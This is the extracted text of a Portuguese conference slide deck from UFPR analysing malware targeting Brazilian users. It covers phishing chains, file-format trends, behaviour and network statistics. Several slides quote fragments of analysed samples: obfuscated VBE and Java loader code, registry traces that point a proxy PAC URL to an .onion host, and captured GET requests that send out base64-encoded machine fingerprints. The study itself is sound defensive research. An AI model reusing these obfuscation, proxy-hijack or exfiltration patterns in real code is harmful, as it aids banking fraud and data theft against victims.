Análise do Malware Ativo na Internet Brasileira: 4 anos depois. O que mudou?
1. Introduc¸˜ao An´alise dos Exemplares Coletados Conclus˜oes
An´alise do Malware Ativo na Internet Brasileira:
4 anos depois. O que mudou?
Marcus Botacin1
1Universidade Federal do Paran´a (UFPR)
mfbotacin@inf.ufpr.br
@MarcusBotacin
An´alise do Malware Ativo na Internet Brasileira: 4 anos depois. O que mudou? 1 / 38 GTS’34
2. Introduc¸˜ao An´alise dos Exemplares Coletados Conclus˜oes
Neste mesmo GTS...
Figura: https://tinyurl.com/yf2anfz2
An´alise do Malware Ativo na Internet Brasileira: 4 anos depois. O que mudou? 2 / 38 GTS’34
3. Introduc¸˜ao An´alise dos Exemplares Coletados Conclus˜oes
O processo de infecc¸˜ao
T´opicos
1 Introduc¸˜ao
O processo de infecc¸˜ao
2 An´alise dos Exemplares Coletados
Formatos de Arquivos
Comportamentos Maliciosos
Tr´afego de Rede
3 Conclus˜oes
Limitac¸˜oes
Conclus˜oes
D´uvidas?
An´alise do Malware Ativo na Internet Brasileira: 4 anos depois. O que mudou? 3 / 38 GTS’34
4. Introduc¸˜ao An´alise dos Exemplares Coletados Conclus˜oes
O processo de infecc¸˜ao
Era uma vez...
Figura: Mensagem SMS.
An´alise do Malware Ativo na Internet Brasileira: 4 anos depois. O que mudou? 4 / 38 GTS’34
5. Introduc¸˜ao An´alise dos Exemplares Coletados Conclus˜oes
O processo de infecc¸˜ao
Era uma vez...
Figura: Site imitando a p´agina do Banco.
An´alise do Malware Ativo na Internet Brasileira: 4 anos depois. O que mudou? 5 / 38 GTS’34
6. Introduc¸˜ao An´alise dos Exemplares Coletados Conclus˜oes
O processo de infecc¸˜ao
Era uma vez...
Figura: Coleta de Informac¸˜oes da V´ıtima.
An´alise do Malware Ativo na Internet Brasileira: 4 anos depois. O que mudou? 6 / 38 GTS’34
7. Introduc¸˜ao An´alise dos Exemplares Coletados Conclus˜oes
O processo de infecc¸˜ao
Era uma vez...
Figura: Transmiss˜ao de Informac¸˜oes para o Atacante.
An´alise do Malware Ativo na Internet Brasileira: 4 anos depois. O que mudou? 7 / 38 GTS’34
8. Introduc¸˜ao An´alise dos Exemplares Coletados Conclus˜oes
O processo de infecc¸˜ao
Era uma vez...
Figura: Coleta de M´ultiplos Fatores de Autenticac¸˜ao.
An´alise do Malware Ativo na Internet Brasileira: 4 anos depois. O que mudou? 8 / 38 GTS’34
9. Introduc¸˜ao An´alise dos Exemplares Coletados Conclus˜oes
O processo de infecc¸˜ao
Era uma vez...
Figura: Transac¸˜ao Falhou (S´erio?).
An´alise do Malware Ativo na Internet Brasileira: 4 anos depois. O que mudou? 9 / 38 GTS’34
10. Introduc¸˜ao An´alise dos Exemplares Coletados Conclus˜oes
O processo de infecc¸˜ao
Era uma vez...
Figura: P´agina n˜ao ´e reconhecida como Maliciosa.
An´alise do Malware Ativo na Internet Brasileira: 4 anos depois. O que mudou? 10 / 38 GTS’34
11. Introduc¸˜ao An´alise dos Exemplares Coletados Conclus˜oes
O processo de infecc¸˜ao
Outros Tipos de phishing
An´alise do Malware Ativo na Internet Brasileira: 4 anos depois. O que mudou? 11 / 38 GTS’34
12. Introduc¸˜ao An´alise dos Exemplares Coletados Conclus˜oes
O processo de infecc¸˜ao
Outros Tipos de phishing
An´alise do Malware Ativo na Internet Brasileira: 4 anos depois. O que mudou? 12 / 38 GTS’34
13. Introduc¸˜ao An´alise dos Exemplares Coletados Conclus˜oes
O processo de infecc¸˜ao
Outros Tipos de phishing
An´alise do Malware Ativo na Internet Brasileira: 4 anos depois. O que mudou? 13 / 38 GTS’34
14. Introduc¸˜ao An´alise dos Exemplares Coletados Conclus˜oes
O processo de infecc¸˜ao
Outros Tipos de phishing
An´alise do Malware Ativo na Internet Brasileira: 4 anos depois. O que mudou? 14 / 38 GTS’34
15. Introduc¸˜ao An´alise dos Exemplares Coletados Conclus˜oes
O processo de infecc¸˜ao
Aplicac¸˜oes Phishing.
Figura: Aplicac¸˜ao Banc´aria Falsa.
An´alise do Malware Ativo na Internet Brasileira: 4 anos depois. O que mudou? 15 / 38 GTS’34
16. Introduc¸˜ao An´alise dos Exemplares Coletados Conclus˜oes
O processo de infecc¸˜ao
Aplicac¸˜oes Phishing.
Figura: Aplicac¸˜ao Banc´aria Falsa.
An´alise do Malware Ativo na Internet Brasileira: 4 anos depois. O que mudou? 16 / 38 GTS’34
17. Introduc¸˜ao An´alise dos Exemplares Coletados Conclus˜oes
O processo de infecc¸˜ao
Quanto dura uma campanha de phishing?
Figura: Campanha n˜ao cessa mesmo ap´os o termino do evento alvo.
An´alise do Malware Ativo na Internet Brasileira: 4 anos depois. O que mudou? 17 / 38 GTS’34
18. Introduc¸˜ao An´alise dos Exemplares Coletados Conclus˜oes
Formatos de Arquivos
T´opicos
1 Introduc¸˜ao
O processo de infecc¸˜ao
2 An´alise dos Exemplares Coletados
Formatos de Arquivos
Comportamentos Maliciosos
Tr´afego de Rede
3 Conclus˜oes
Limitac¸˜oes
Conclus˜oes
D´uvidas?
An´alise do Malware Ativo na Internet Brasileira: 4 anos depois. O que mudou? 18 / 38 GTS’34
19. Introduc¸˜ao An´alise dos Exemplares Coletados Conclus˜oes
Formatos de Arquivos
Diversidade de Formatos.
0%
10%
20%
30%
40%
50%
60%
70%
80%
90%
100%
2012 2013 2014 2015 2016 2017 2018
Samples(%)
Year
Evolution of threat’s filetype
PE
CPL
.NET
DLL
JAR
JS
VBE
Figura: Distribuic¸˜ao dos Formatos de Arquivos utilizados por malware.
An´alise do Malware Ativo na Internet Brasileira: 4 anos depois. O que mudou? 19 / 38 GTS’34
20. Introduc¸˜ao An´alise dos Exemplares Coletados Conclus˜oes
Formatos de Arquivos
Ameac¸as VBE
1 Set Nics=obJWMIService.ExEcQuery("SELECT␣*␣FROM␣
Win32_NetworkAdapterConfiguration ␣WHERE␣
IPEnabled␣=␣True")
C´odigo 1: Exemplar de malware VBE obtendo informac¸˜oes de sistema
atrav´es da consulta SQL as bases de dados.
1 set objShell = CreateObject(CryptXor("c0+4","N0X")
& ".Application")
C´odigo 2: Exemplar de malware VBE instanciando um objeto a partir
de uma string codificada usando operac¸˜oes XOR.
An´alise do Malware Ativo na Internet Brasileira: 4 anos depois. O que mudou? 20 / 38 GTS’34
21. Introduc¸˜ao An´alise dos Exemplares Coletados Conclus˜oes
Formatos de Arquivos
Ameac¸as JAVA
1 public static void main(String args []){
2 File jsjmj3194 = new File ((new StringBuilder(
String.valueOf(bcvsnpdbxw4095 ("THKHBI ...",
abdwwhftjb7743 )))).append("x").toString ());
C´odigo 3: Exemplar de malware JAR ofuscado.
1 if(jsjmj3194.exists ())
2 System.exit (1);
C´odigo 4: Exemplar de malware JAR confirmando a infecc¸˜ao.
1 Runtime.getRuntime ().exec ((new StringBuilder ()).
append("rundll32␣SHELL32.DLL , ShellExec_RunDLL ␣")
.append( qOggErFmPnJO6UUHp ).append(rQ47EvtcHUKw).
toString ());
C´odigo 5: Exemplar de malware JAR carregando bibliotecas externas.
An´alise do Malware Ativo na Internet Brasileira: 4 anos depois. O que mudou? 21 / 38 GTS’34
22. Introduc¸˜ao An´alise dos Exemplares Coletados Conclus˜oes
Formatos de Arquivos
Ameac¸as JavaScript
1 .protocol === "https:" ? "https ://s." : "http ://e.")
+ ".server.com/q.js"
C´odigo 6: Exemplar de malware Javascript construindo uma URL em
tempo de execuc¸˜ao.
An´alise do Malware Ativo na Internet Brasileira: 4 anos depois. O que mudou? 22 / 38 GTS’34
23. Introduc¸˜ao An´alise dos Exemplares Coletados Conclus˜oes
Comportamentos Maliciosos
T´opicos
1 Introduc¸˜ao
O processo de infecc¸˜ao
2 An´alise dos Exemplares Coletados
Formatos de Arquivos
Comportamentos Maliciosos
Tr´afego de Rede
3 Conclus˜oes
Limitac¸˜oes
Conclus˜oes
D´uvidas?
An´alise do Malware Ativo na Internet Brasileira: 4 anos depois. O que mudou? 23 / 38 GTS’34
24. Introduc¸˜ao An´alise dos Exemplares Coletados Conclus˜oes
Comportamentos Maliciosos
Como os exemplares s˜ao detectados?
0%
10%
20%
30%
PSW
Downloader
Generic
Win32
Delf
Dropper
Luhe
Suspicion:
Delfi
Autoit_c
Inject2
unknown
Detection Labels Distribuition
Figura: R´otulos de Detecc¸˜ao por Antiv´ırus.
An´alise do Malware Ativo na Internet Brasileira: 4 anos depois. O que mudou? 24 / 38 GTS’34
25. Introduc¸˜ao An´alise dos Exemplares Coletados Conclus˜oes
Comportamentos Maliciosos
Comportamentos Observados
Tabela: Comparac¸˜ao dos comportamentos observados no dataset
brasileiro e no trabalho de Bayer et al.
Comportamento Brasil Bayer et al. (2009)
Alterac¸˜ao de hosts 0.09% 1.97%
Criac¸˜ao de arquivos 24.64% 70.78%
Remoc¸˜ao de arquivos 12.09% 42.57%
Modificac¸˜ao de arquivos 16.09% 79.87%
Instalac¸˜ao de BHOs 1.03% 1.72%
Tr´afego de Rede 96.47% 55.18%
Criac¸˜ao de chaves de registro 29.93% 64.71%
Criac¸˜ao de processos 16.83% 52.19%
An´alise do Malware Ativo na Internet Brasileira: 4 anos depois. O que mudou? 25 / 38 GTS’34
26. Introduc¸˜ao An´alise dos Exemplares Coletados Conclus˜oes
Comportamentos Maliciosos
Configurac¸˜ao Autom´atica de Proxy (PAC).
1 malware.exe|SetValueKey|HKCUSoftwareMicrosoft
Internet ExplorerSearchScopes {ID}| OSDFileURL|
file:///C:/ Users/Win7/AppData/Local/TNT2/
Profiles/ e0e63dcbb29a2180f8300 /
ose0e63dcbb29a2180f8300 .xml
C´odigo 7: Trecho de um trac¸o de execuc¸˜ao de um exemplar de
malware definindo uma configurac¸˜ao de proxy via arquivo PAC.
1 malware.exe|SetValueKey|HKCUSoftwareMicrosoft
WindowsCurrentVersion Internet Settings|
AutoConfigURL|http:// p3vramfcx4ybpvnj .onion/
Bl5CHrZV.js?ip =143.106.Y.Z
C´odigo 8: Trecho de um trac¸o de execuc¸˜ao de um exemplar de
malware definindo uma configurac¸˜ao de proxy via registro do sistema
operacional.
An´alise do Malware Ativo na Internet Brasileira: 4 anos depois. O que mudou? 26 / 38 GTS’34
27. Introduc¸˜ao An´alise dos Exemplares Coletados Conclus˜oes
Tr´afego de Rede
T´opicos
1 Introduc¸˜ao
O processo de infecc¸˜ao
2 An´alise dos Exemplares Coletados
Formatos de Arquivos
Comportamentos Maliciosos
Tr´afego de Rede
3 Conclus˜oes
Limitac¸˜oes
Conclus˜oes
D´uvidas?
An´alise do Malware Ativo na Internet Brasileira: 4 anos depois. O que mudou? 27 / 38 GTS’34
28. Introduc¸˜ao An´alise dos Exemplares Coletados Conclus˜oes
Tr´afego de Rede
Uso de Protocolos
Tabela: Comparac¸˜ao do tr´afego de rede exibido pelos exemplares de
malware brasileiros e os observador por Bayer et al.
Protocolo 2012(T) 2013(T) 2014(T) 2015(T) 2016(T) 2017(T) Bayer(09)
TCP 40.87% 41.24% 56.19% 64.24% 74.86% 84.85% 45.74%
UDP 52.76% 54.74% 52.00% 59.42% 74.86% 84.85% 27.34%
ICMP 1.28% 1.70% 1.33% 5.63% 0.57% 1.17% 7.58%
DNS 52.69% 54.73% 51.98% 49.04% 47.43% 74.59% 24.53%
HTTP 38.63% 39.69% 52.03% 44.93% 74.86% 84.38% 20.75%
SSL 5.30% 5.62% 4.64% 6.53% 10.29% 26.57% 0.23%
SMTP 0.21% 0.01% 0.06% 0.21% 0.0% 0.0% N.A.1
1
N˜ao Dispon´ıvel
An´alise do Malware Ativo na Internet Brasileira: 4 anos depois. O que mudou? 28 / 38 GTS’34
29. Introduc¸˜ao An´alise dos Exemplares Coletados Conclus˜oes
Tr´afego de Rede
Exfiltrac¸˜ao de Informac¸˜oes.
1 GET maisumavezconta .info/escrita /? Client=
Y29udGFkb3IwMw ==& GetMacAddress=
NTI6NTQ6MDA6QTA6MDQ6MTk =&
GetWinVersionAsStringWinArch = V2luZG93cyA3ICg2NCk
=& VersaoModulo=djE=& GetPCName=V0lON19WTTE =&
DetectPlugin=TuNv& DetectAntiVirus =T0ZG
C´odigo 9: Trecho de um tr´afego de rede exemplificando um exemplar
de malware que realiza o fingerprint da m´aquina infectada.
1 GET counter1.webcontadores.com :8080/ private/pointeur
/pointeur.gif?|<hash >|600*800| pt|32|< serial >|
computer|windows |7| internet + explorer |7| Brazil|
BR|X|Y|City|University | -14400|0|1432126706| ok|
C´odigo 10: Trecho de um tr´afego de rede exemplificando a coleta de
informac¸˜oes de geolocalizac¸˜ao.
An´alise do Malware Ativo na Internet Brasileira: 4 anos depois. O que mudou? 29 / 38 GTS’34
30. Introduc¸˜ao An´alise dos Exemplares Coletados Conclus˜oes
Tr´afego de Rede
De onde partem os Ataques?
Figura: Mapa dos Ataques.
An´alise do Malware Ativo na Internet Brasileira: 4 anos depois. O que mudou? 30 / 38 GTS’34
31. Introduc¸˜ao An´alise dos Exemplares Coletados Conclus˜oes
Tr´afego de Rede
Dom´ınios Contatados
Tabela: Tr´afego de Rede por dom´ınio (top-10).
% Exemplares % Payloads Host
22.45% None google.com
22.43% None google-public-dns-a.google.com
5.34% 9.71% akamaitechnologies.com
4.50% 8.18 1e100.net
3.32% 6.04 amazonaws.com
1.50% 2.73 clouduol.com.br
1.27% 2.31 locaweb.com.br
0.94% None uol.com.br
0.77% None secureserver.net
0.69% None a-msedge.net
An´alise do Malware Ativo na Internet Brasileira: 4 anos depois. O que mudou? 31 / 38 GTS’34
32. Introduc¸˜ao An´alise dos Exemplares Coletados Conclus˜oes
Limitac¸˜oes
T´opicos
1 Introduc¸˜ao
O processo de infecc¸˜ao
2 An´alise dos Exemplares Coletados
Formatos de Arquivos
Comportamentos Maliciosos
Tr´afego de Rede
3 Conclus˜oes
Limitac¸˜oes
Conclus˜oes
D´uvidas?
An´alise do Malware Ativo na Internet Brasileira: 4 anos depois. O que mudou? 32 / 38 GTS’34
33. Introduc¸˜ao An´alise dos Exemplares Coletados Conclus˜oes
Limitac¸˜oes
Limitac¸˜oes & Trabalhos Futuros
Limitac¸˜oes
Apenas sistemas Windows.
Apenas aplicac¸˜oes em modo usu´ario.
Trabalhos Futuros
Ampliac¸˜ao das an´alises.
Monitorac¸˜ao cont´ınua.
Colaborac¸˜oes e Parcerias.
An´alise do Malware Ativo na Internet Brasileira: 4 anos depois. O que mudou? 33 / 38 GTS’34
34. Introduc¸˜ao An´alise dos Exemplares Coletados Conclus˜oes
Conclus˜oes
T´opicos
1 Introduc¸˜ao
O processo de infecc¸˜ao
2 An´alise dos Exemplares Coletados
Formatos de Arquivos
Comportamentos Maliciosos
Tr´afego de Rede
3 Conclus˜oes
Limitac¸˜oes
Conclus˜oes
D´uvidas?
An´alise do Malware Ativo na Internet Brasileira: 4 anos depois. O que mudou? 34 / 38 GTS’34
35. Introduc¸˜ao An´alise dos Exemplares Coletados Conclus˜oes
Conclus˜oes
Conclus˜oes
Principais Descobertas
Infecc¸˜oes via phishing.
Aplicac¸˜oes falsas.
Variados formatos de arquivo.
Exfiltrac¸˜ao de informac¸˜oes sens´ıveis.
Armazenamento em servic¸os de nuvem.
An´alise do Malware Ativo na Internet Brasileira: 4 anos depois. O que mudou? 35 / 38 GTS’34
36. Introduc¸˜ao An´alise dos Exemplares Coletados Conclus˜oes
Conclus˜oes
Chamado para Ac¸˜ao!
https://corvus.inf.ufpr.br/
Figura: Sistema web de an´alise de malware.
An´alise do Malware Ativo na Internet Brasileira: 4 anos depois. O que mudou? 36 / 38 GTS’34
37. Introduc¸˜ao An´alise dos Exemplares Coletados Conclus˜oes
D´uvidas?
T´opicos
1 Introduc¸˜ao
O processo de infecc¸˜ao
2 An´alise dos Exemplares Coletados
Formatos de Arquivos
Comportamentos Maliciosos
Tr´afego de Rede
3 Conclus˜oes
Limitac¸˜oes
Conclus˜oes
D´uvidas?
An´alise do Malware Ativo na Internet Brasileira: 4 anos depois. O que mudou? 37 / 38 GTS’34
38. Introduc¸˜ao An´alise dos Exemplares Coletados Conclus˜oes
D´uvidas?
Contato
mfbotacin@inf.ufpr.br
@MarcusBotacin
An´alise do Malware Ativo na Internet Brasileira: 4 anos depois. O que mudou? 38 / 38 GTS’34